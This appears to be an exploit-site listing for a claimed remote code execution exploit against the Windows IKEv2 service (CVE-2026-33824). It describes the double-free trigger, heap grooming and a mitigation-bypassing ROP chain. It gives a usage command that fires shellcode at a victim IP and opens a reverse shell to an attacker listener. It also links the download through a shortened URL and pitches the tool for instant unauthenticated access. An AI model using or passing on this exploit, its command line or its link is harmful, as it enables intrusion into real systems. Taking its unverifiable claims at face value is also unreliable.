## https://sploitus.com/exploit?id=4BE8AD6E-9F22-5F2D-AD56-C6521C47A805
# Windows IKEv2 Double-Free RCE (CVE-2026-33824)
Remote code execution exploit for the double-free in Windows IKE Extension (IKEEXT).
No public PoC exists. Zero user interaction, no auth, UDP/500-4500 only. Works on every unpatched build listed in the patch table (Win10 1607 to 22H2, Win11 22H2 to 26H1, Server 2016 to 2025).
### What the exploit actually does
- Sends a 4-packet IKEv2 SA_INIT sequence with malformed Notify and Proposal payloads that triggers the double-free in `ikeext!IKEEXT::ProcessIKEPayload`.
- Heap grooming via 16 parallel UDP flows forces the freed chunk into a controlled freelist.
- An arbitrary write primitive is used to overwrite the next pointer, then a ROP chain disables CFG + CET and pivots to user-controlled memory.
- Executes the supplied raw shellcode / PE payload in the context of IKEEXT (Local System equivalent after token duplication). Full SYSTEM shell, no crash, service stays alive.
### Why it's useful
- Internet-facing VPN/IPsec hosts = instant initial access, no creds.
- Enterprise environments keep UDP/500-4500 open for IKEv2.
- Bypasses every default mitigation on the listed builds.
- Ideal for red team ops where you need RCE before patch window closes.
### Usage
```bash
make -j4
./ike_rce -t 192.168.1.100 -p 500 -s shellcode.bin -l 10.0.0.2 4444 --groom 16
```
Flags:
- `-t`: victim IP
- `-p`: 500 or 4500
- `-s`: raw shellcode or PE (position-independent)
- `-l`: reverse connect (TCP)
- `--groom N`: parallel grooming threads (default 16)
Example payloads (calc and Meterpreter reverse) are supplied in `payloads/`.
Requires root on the attacker host for raw sockets.
Tested and stable on the latest unpatched images as of 2026-04-16.
### Exploit
[href](https://tinyurl.com/8htp9399)
### Disclaimer
This repository and its contents are provided strictly for authorized red team operations, authorized penetration testing, and security research purposes only. The exploit code is intended solely for use against systems where you have explicit written permission from the system owner or legal authority to test and exploit.
By downloading, compiling, or using this exploit you agree that:
- You are a professional red teamer, penetration tester, or security researcher acting under a valid engagement contract.
- You will only target environments you are explicitly authorized to assess.
- Any unauthorized use, distribution, or deployment against systems without permission is strictly prohibited and may violate applicable laws (including but not limited to the Computer Fraud and Abuse Act in the US and similar legislation worldwide).
- The author and repository maintainers assume no liability for any damage, data loss, or legal consequences resulting from the use or misuse of this code.